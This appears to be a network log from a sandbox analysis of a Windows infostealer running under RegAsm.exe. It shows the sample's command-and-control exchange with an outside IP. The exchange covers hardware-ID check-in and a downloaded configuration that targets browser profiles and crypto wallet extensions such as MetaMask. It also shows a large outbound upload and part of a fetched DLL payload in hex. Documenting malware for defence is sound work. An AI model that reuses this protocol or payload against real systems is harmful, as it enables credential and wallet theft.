2024-04-26 19:35:11 UTC	9229	IN	Data Raw: 70 61 72 74 6e 65 72 2e 73 74 65 61 6d 67 61 6d 65 73 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 41 54 53 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 70 61 72 74 6e 65 72 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 49 4e 54 45 52 4e 41 4c 5f 53 54 41 54 53 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 65 61 6d 73 74 61 74 73 2e 76 61 6c 76 65 2e 6f 72 67 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 49 4e 5f 43 4c 49 45 4e 54 26 71 75 6f 74 3b 3a 66 61 6c 73 65 2c 26 71 75 6f 74 3b 55 53 45 5f 50 4f 50 55 50 53 26 71 75 6f 74 3b 3a 66 61 6c 73 65 2c 26 71 75 6f 74 3b 53 54 4f 52 Data Ascii: partner.steamgames.com\/","STATS_BASE_URL":"https:\/\/partner.steampowered.com\/","INTERNAL_STATS_BASE_URL":"https:\/\/steamstats.valve.org\/","IN_CLIENT":false,"USE_POPUPS":false,"STOR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49733	95.217.246.168	443	7344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 19:35:13 UTC	171	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Connection: Keep-Alive Cache-Control: no-cache
2024-04-26 19:35:14 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 19:35:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-26 19:35:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49734	95.217.246.168	443	7344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 19:35:14 UTC	263	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIIIJDAAAAAAKECBFBAE User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 278 Connection: Keep-Alive Cache-Control: no-cache
2024-04-26 19:35:14 UTC	278	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 45 45 34 35 45 42 32 43 43 38 34 36 35 38 35 34 32 32 34 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 48 Data Ascii: ------HIIIJDAAAAAAKECBFBAEContent-Disposition: form-data; name="hwid"A0EE45EB2CC8465854224-a33c7340-61ca-11ee-8c18-806e6f6e6963------HIIIJDAAAAAAKECBFBAEContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------H
2024-04-26 19:35:15 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 19:35:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-26 19:35:15 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 30 7c 65 39 32 34 64 64 63 64 37 62 66 30 33 62 66 63 34 30 62 64 34 65 33 62 37 65 31 32 39 35 64 36 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|0\|e924ddcd7bf03bfc40bd4e3b7e1295d6\|1\|1\|1\|0\|0\|50000\|00

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49735	95.217.246.168	443	7344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 19:35:17 UTC	263	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBKKKEGIDBGHIDGDHDBF User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-26 19:35:17 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 32 34 64 64 63 64 37 62 66 30 33 62 66 63 34 30 62 64 34 65 33 62 37 65 31 32 39 35 64 36 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 0d 0a 43 6f 6e 74 Data Ascii: ------EBKKKEGIDBGHIDGDHDBFContent-Disposition: form-data; name="token"e924ddcd7bf03bfc40bd4e3b7e1295d6------EBKKKEGIDBGHIDGDHDBFContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------EBKKKEGIDBGHIDGDHDBFCont
2024-04-26 19:35:18 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 19:35:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-26 19:35:18 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49736	95.217.246.168	443	7344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 19:35:18 UTC	263	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCBFIJJECFIEBGDGCFIJ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-26 19:35:18 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 43 42 46 49 4a 4a 45 43 46 49 45 42 47 44 47 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 32 34 64 64 63 64 37 62 66 30 33 62 66 63 34 30 62 64 34 65 33 62 37 65 31 32 39 35 64 36 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 46 49 4a 4a 45 43 46 49 45 42 47 44 47 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 46 49 4a 4a 45 43 46 49 45 42 47 44 47 43 46 49 4a 0d 0a 43 6f 6e 74 Data Ascii: ------HCBFIJJECFIEBGDGCFIJContent-Disposition: form-data; name="token"e924ddcd7bf03bfc40bd4e3b7e1295d6------HCBFIJJECFIEBGDGCFIJContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------HCBFIJJECFIEBGDGCFIJCont
2024-04-26 19:35:19 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 19:35:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-26 19:35:19 UTC	5165	IN	Data Raw: 31 34 32 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1420TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49737	95.217.246.168	443	7344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 19:35:20 UTC	264	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGDGDHJJDGHCAAAKEHIJ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Content-Length: 7477 Connection: Keep-Alive Cache-Control: no-cache
2024-04-26 19:35:20 UTC	7477	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 32 34 64 64 63 64 37 62 66 30 33 62 66 63 34 30 62 64 34 65 33 62 37 65 31 32 39 35 64 36 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 0d 0a 43 6f 6e 74 Data Ascii: ------EGDGDHJJDGHCAAAKEHIJContent-Disposition: form-data; name="token"e924ddcd7bf03bfc40bd4e3b7e1295d6------EGDGDHJJDGHCAAAKEHIJContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------EGDGDHJJDGHCAAAKEHIJCont
2024-04-26 19:35:21 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 19:35:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-26 19:35:21 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49738	95.217.246.168	443	7344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 19:35:21 UTC	179	OUT	GET /sqln.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Connection: Keep-Alive Cache-Control: no-cache
2024-04-26 19:35:22 UTC	248	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 19:35:21 GMT Content-Type: application/octet-stream Content-Length: 2459136 Last-Modified: Mon, 22 Apr 2024 11:42:56 GMT Connection: close ETag: "66264d40-258600" Accept-Ranges: bytes
2024-04-26 19:35:22 UTC	16136	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-04-26 19:35:22 UTC	16384	IN	Data Raw: cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: X~e!*FW\|>\|L1146
2024-04-26 19:35:22 UTC	16384	IN	Data Raw: 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 e8 51 39 10 00 83 c4 20 80 7e 57 00 5b Data Ascii: tP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSVQ9 ~W[
2024-04-26 19:35:22 UTC	16384	IN	Data Raw: be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 28 89 4c 24 58 e9 f4 00 00 00 8b 46 08 Data Ascii: 0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5t$(L$XF
2024-04-26 19:35:22 UTC	16384	IN	Data Raw: 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b 44 24 14 39 44 24 38 76 12 8b 07 51 ff Data Ascii: $;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|D$9D$8vQ
2024-04-26 19:35:22 UTC	16384	IN	Data Raw: 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: 3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-04-26 19:35:22 UTC	16384	IN	Data Raw: ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: T$L$$l$ GT$GL$L$T$_^][_^]3[
2024-04-26 19:35:22 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 Data Ascii: Vt$W\|$FVBhtw7t7Vg_^jjjh,g!t$jjjh
2024-04-26 19:35:22 UTC	16384	IN	Data Raw: 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b 4c 24 10 4a d3 e2 09 96 c4 00 00 00 5f Data Ascii: qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$L$J_
2024-04-26 19:35:22 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 56 ff 15 3c 20 24 10 a1 38 82 24 10 83 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh 